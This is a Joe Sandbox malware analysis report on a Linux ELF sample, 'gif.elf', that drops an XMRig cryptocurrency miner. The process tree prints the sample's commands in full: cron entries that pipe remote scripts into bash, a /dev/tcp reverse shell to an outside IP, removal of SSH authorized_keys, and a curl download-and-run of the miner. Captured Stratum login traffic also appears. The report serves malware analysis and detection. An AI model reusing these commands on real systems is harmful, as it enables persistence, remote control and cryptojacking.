Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
gif.elf

Overview

General Information

Sample name:gif.elf
Analysis ID:1633205
MD5:ec8ec8bb794a4cb09aaf8ff893829e94
SHA1:3aec40bbcc256509c94bc05ee5bc10786a1dbe66
SHA256:4b5d2f096d5e4d4a0cdbddc11f8abc8b3639ff140c5a0ec750ed6b578b0f37d2
Tags:elfuser-abuse_ch
Infos:

Detection

Xmrig
Score:100
Range:0 - 100

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Detected Stratum mining protocol
Drops invisible ELF files
Executes itself again with its parent PID as an argument (indicative of hampering debugging)
Found strings related to Crypto-Mining
Protects files from modification
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using cron
Sample tries to set files in /etc globally writable
Terminates several processes with shell command 'killall'
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Reads the 'hosts' file potentially containing internal network hosts
Removes protection from files
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1633205
Start date and time:2025-03-10 02:51:25 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 41s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:gif.elf
Detection:MAL
Classification:mal100.troj.evad.mine.linELF@0/10@12/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: o.softgoldinformation.com
Command:/tmp/gif.elf
PID:5482
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • gif.elf (PID: 5482, Parent: 5407, MD5: ec8ec8bb794a4cb09aaf8ff893829e94) Arguments: /tmp/gif.elf
    • gif.elf New Fork (PID: 5483, Parent: 5482)
      • gif.elf New Fork (PID: 5484, Parent: 5483)
        • gif.elf New Fork (PID: 5485, Parent: 5484)
        • sh (PID: 5485, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /root/.ssh"
          • sh New Fork (PID: 5486, Parent: 5485)
          • chattr (PID: 5486, Parent: 5485, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /root/.ssh
        • gif.elf New Fork (PID: 5487, Parent: 5484)
        • sh (PID: 5487, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /root/.ssh/authorized_keys2"
          • sh New Fork (PID: 5488, Parent: 5487)
          • rm (PID: 5488, Parent: 5487, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.ssh/authorized_keys2
        • gif.elf New Fork (PID: 5489, Parent: 5484)
        • sh (PID: 5489, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /root/.ssh/authorized_keys2"
          • sh New Fork (PID: 5490, Parent: 5489)
          • chattr (PID: 5490, Parent: 5489, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /root/.ssh/authorized_keys2
        • gif.elf New Fork (PID: 5491, Parent: 5484)
        • sh (PID: 5491, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /etc/cron.d > /dev/null 2>&1"
          • sh New Fork (PID: 5492, Parent: 5491)
          • chattr (PID: 5492, Parent: 5491, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /etc/cron.d
        • gif.elf New Fork (PID: 5493, Parent: 5484)
        • sh (PID: 5493, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /etc/crontab > /dev/null 2>&1"
          • sh New Fork (PID: 5494, Parent: 5493)
          • chattr (PID: 5494, Parent: 5493, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /etc/crontab
        • gif.elf New Fork (PID: 5495, Parent: 5484)
        • sh (PID: 5495, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /var/spool/cron > /dev/null 2>&1"
          • sh New Fork (PID: 5496, Parent: 5495)
          • chattr (PID: 5496, Parent: 5495, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /var/spool/cron
        • gif.elf New Fork (PID: 5497, Parent: 5484)
        • sh (PID: 5497, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /var/spool/cron/crontabs > /dev/null 2>&1"
          • sh New Fork (PID: 5498, Parent: 5497)
          • chattr (PID: 5498, Parent: 5497, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /var/spool/cron/crontabs
        • gif.elf New Fork (PID: 5499, Parent: 5484)
        • sh (PID: 5499, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /etc/cron.hourly > /dev/null 2>&1"
          • sh New Fork (PID: 5500, Parent: 5499)
          • chattr (PID: 5500, Parent: 5499, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /etc/cron.hourly
        • gif.elf New Fork (PID: 5501, Parent: 5484)
        • sh (PID: 5501, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo '0 1 * * * root curl -fs http://z.shavsl.com/b|bash ' > /etc/cron.d/watch"
        • gif.elf New Fork (PID: 5502, Parent: 5484)
        • sh (PID: 5502, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo '0 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash ' >> /etc/cron.d/watch"
        • gif.elf New Fork (PID: 5503, Parent: 5484)
        • sh (PID: 5503, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /etc/cron.d/watch > /dev/null 2>&1"
          • sh New Fork (PID: 5504, Parent: 5503)
          • chattr (PID: 5504, Parent: 5503, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /etc/cron.d/watch
        • gif.elf New Fork (PID: 5505, Parent: 5484)
        • sh (PID: 5505, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo '#!/bin/bash' > /etc/cron.hourly/prelink"
        • gif.elf New Fork (PID: 5506, Parent: 5484)
        • sh (PID: 5506, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo 'bash -i >& /dev/tcp/45.125.66.31/8443 0>&1' >> /etc/cron.hourly/prelink"
        • gif.elf New Fork (PID: 5507, Parent: 5484)
        • sh (PID: 5507, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod 755 /etc/cron.hourly/prelink"
          • sh New Fork (PID: 5508, Parent: 5507)
          • chmod (PID: 5508, Parent: 5507, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 755 /etc/cron.hourly/prelink
        • gif.elf New Fork (PID: 5509, Parent: 5484)
        • sh (PID: 5509, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /etc/cron.hourly/prelink > /dev/null 2>&1"
          • sh New Fork (PID: 5510, Parent: 5509)
          • chattr (PID: 5510, Parent: 5509, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /etc/cron.hourly/prelink
        • gif.elf New Fork (PID: 5511, Parent: 5484)
        • sh (PID: 5511, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /root/.ssh"
          • sh New Fork (PID: 5512, Parent: 5511)
          • chattr (PID: 5512, Parent: 5511, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /root/.ssh
        • gif.elf New Fork (PID: 5513, Parent: 5484)
        • sh (PID: 5513, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /root/.ssh/authorized_keys"
          • sh New Fork (PID: 5514, Parent: 5513)
          • rm (PID: 5514, Parent: 5513, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.ssh/authorized_keys
        • gif.elf New Fork (PID: 5515, Parent: 5484)
        • sh (PID: 5515, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /root/.ssh/authorized_keys"
          • sh New Fork (PID: 5516, Parent: 5515)
          • chattr (PID: 5516, Parent: 5515, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /root/.ssh/authorized_keys
        • gif.elf New Fork (PID: 5517, Parent: 5484)
        • sh (PID: 5517, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /root/.ssh"
          • sh New Fork (PID: 5518, Parent: 5517)
          • chattr (PID: 5518, Parent: 5517, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /root/.ssh
        • gif.elf New Fork (PID: 5519, Parent: 5484)
        • sh (PID: 5519, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /root/.ssh/authorized_keys2"
          • sh New Fork (PID: 5520, Parent: 5519)
          • rm (PID: 5520, Parent: 5519, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.ssh/authorized_keys2
        • gif.elf New Fork (PID: 5521, Parent: 5484)
        • sh (PID: 5521, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /root/.ssh/authorized_keys2"
          • sh New Fork (PID: 5522, Parent: 5521)
          • chattr (PID: 5522, Parent: 5521, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /root/.ssh/authorized_keys2
        • gif.elf New Fork (PID: 5523, Parent: 5484)
        • sh (PID: 5523, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner && chmod 755 /tmp/.miner && /tmp/.miner"
          • sh New Fork (PID: 5524, Parent: 5523)
          • curl (PID: 5524, Parent: 5523, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner
          • sh New Fork (PID: 5530, Parent: 5523)
          • chmod (PID: 5530, Parent: 5523, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 755 /tmp/.miner
          • sh New Fork (PID: 5531, Parent: 5523)
          • .miner (PID: 5531, Parent: 5523, MD5: 44de739950eb4a8a3552b4e1987e8ec2) Arguments: /tmp/.miner
            • .miner New Fork (PID: 5532, Parent: 5531)
            • sh (PID: 5532, Parent: 5531, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -f /etc/hosts.old"
              • sh New Fork (PID: 5533, Parent: 5532)
              • rm (PID: 5533, Parent: 5532, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /etc/hosts.old
            • .miner New Fork (PID: 5534, Parent: 5531)
              • .miner New Fork (PID: 5535, Parent: 5534)
              • sh (PID: 5535, Parent: 5534, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mount --bind /proc/1 /proc/5534"
                • sh New Fork (PID: 5537, Parent: 5535)
                • mount (PID: 5537, Parent: 5535, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount --bind /proc/1 /proc/5534
        • gif.elf New Fork (PID: 5536, Parent: 5484)
        • sh (PID: 5536, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /tmp/python > /dev/null 2>&1 && rm -rf /tmp/python > /dev/null 2>&1"
          • sh New Fork (PID: 5538, Parent: 5536)
          • chattr (PID: 5538, Parent: 5536, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /tmp/python
        • gif.elf New Fork (PID: 5564, Parent: 5484)
        • sh (PID: 5564, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia chattr -ia /usr/bin/bsd-port/getty > /dev/null 2>&1 && rm -rf /usr/bin/bsd-port/getty > /dev/null 2>&1"
          • sh New Fork (PID: 5565, Parent: 5564)
          • chattr (PID: 5565, Parent: 5564, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia chattr -ia /usr/bin/bsd-port/getty
        • gif.elf New Fork (PID: 5566, Parent: 5484)
        • sh (PID: 5566, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /usr/bin/.sshd > /dev/null 2>&1 && rm -rf /usr/bin/.sshd > /dev/null 2>&1"
          • sh New Fork (PID: 5567, Parent: 5566)
          • chattr (PID: 5567, Parent: 5566, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /usr/bin/.sshd
        • gif.elf New Fork (PID: 5568, Parent: 5484)
        • sh (PID: 5568, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /etc/rc.d/init.d/selinux > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/selinux > /dev/null 2>&1"
          • sh New Fork (PID: 5569, Parent: 5568)
          • chattr (PID: 5569, Parent: 5568, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /etc/rc.d/init.d/selinux
        • gif.elf New Fork (PID: 5570, Parent: 5484)
        • sh (PID: 5570, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /etc/rc.d/init.d/DbSecuritySp > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/DbSecuritySpt > /dev/null 2>&1"
          • sh New Fork (PID: 5571, Parent: 5570)
          • chattr (PID: 5571, Parent: 5570, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /etc/rc.d/init.d/DbSecuritySp
        • gif.elf New Fork (PID: 5572, Parent: 5484)
        • sh (PID: 5572, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /usr/bin/sh.sh > /dev/null 2>&1 && rm -rf /usr/bin/sh.sh > /dev/null 2>&1"
          • sh New Fork (PID: 5573, Parent: 5572)
          • chattr (PID: 5573, Parent: 5572, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /usr/bin/sh.sh
        • gif.elf New Fork (PID: 5574, Parent: 5484)
        • sh (PID: 5574, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /etc/cron.hourly/cron.sh > /dev/null 2>&1 && rm -rf /etc/cron.hourly/cron.sh > /dev/null 2>&1"
          • sh New Fork (PID: 5575, Parent: 5574)
          • chattr (PID: 5575, Parent: 5574, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /etc/cron.hourly/cron.sh
        • gif.elf New Fork (PID: 5576, Parent: 5484)
        • sh (PID: 5576, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /lib/udev/udev /lib/udev/debug > /dev/null 2>&1 && rm -rf /lib/udev/udev /lib/udev/debug > /dev/null 2>&1"
          • sh New Fork (PID: 5577, Parent: 5576)
          • chattr (PID: 5577, Parent: 5576, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /lib/udev/udev /lib/udev/debug
        • gif.elf New Fork (PID: 5578, Parent: 5484)
        • sh (PID: 5578, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /usr/bin/xrig > /dev/null 2>&1 && rm -rf /usr/bin/xrig 1> /dev/null 2>&1"
          • sh New Fork (PID: 5579, Parent: 5578)
          • chattr (PID: 5579, Parent: 5578, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /usr/bin/xrig
        • gif.elf New Fork (PID: 5580, Parent: 5484)
        • sh (PID: 5580, Parent: 5484, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "killall .sshd xrig getty > /dev/null 2>&1 "
          • sh New Fork (PID: 5581, Parent: 5580)
          • killall (PID: 5581, Parent: 5580, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall .sshd xrig getty
  • cleanup
SourceRuleDescriptionAuthorStrings
5531.1.0000000000400000.0000000000886000.r-x.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    5531.1.0000000000400000.0000000000886000.r-x.sdmpLinux_Trojan_Pornoasset_927f314funknownunknown
    • 0x13ce98:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
    5531.1.0000000000400000.0000000000886000.r-x.sdmpminer_lin_xmrig_stringsDetects XMRig ELFSekoia.io
    • 0x3a6d40:$: XMRig
    • 0x3a736f:$: IP Address currently banned
    • 0x3a7478:$: rigid
    • 0x3a843b:$: pool address
    • 0x3a8448:$: ping time
    • 0x3a8452:$: connection time
    • 0x401d70:$: connection time
    • 0x3a8a10:$: socks5://
    • 0x3a4688:$: stratum+ssl://
    • 0x3a8a20:$: stratum+ssl://
    • 0x3b36d8:$: stratum+ssl://
    • 0x3a8a30:$: stratum+tcp://
    Process Memory Space: sh PID: 5531JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      Process Memory Space: .miner PID: 5531JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: /tmp/.minerAvira: detection malicious, Label: LINUX/BitCoinMiner.jrext
        Source: gif.elfVirustotal: Detection: 9%Perma Link

        Bitcoin Miner

        barindex
        Source: Yara matchFile source: 5531.1.0000000000400000.0000000000886000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: sh PID: 5531, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: .miner PID: 5531, type: MEMORYSTR
        Source: global trafficTCP traffic: 192.168.2.13:55878 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55880 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55882 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55884 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55886 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55888 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55890 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55892 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55894 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55896 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55898 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55900 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55902 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55904 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
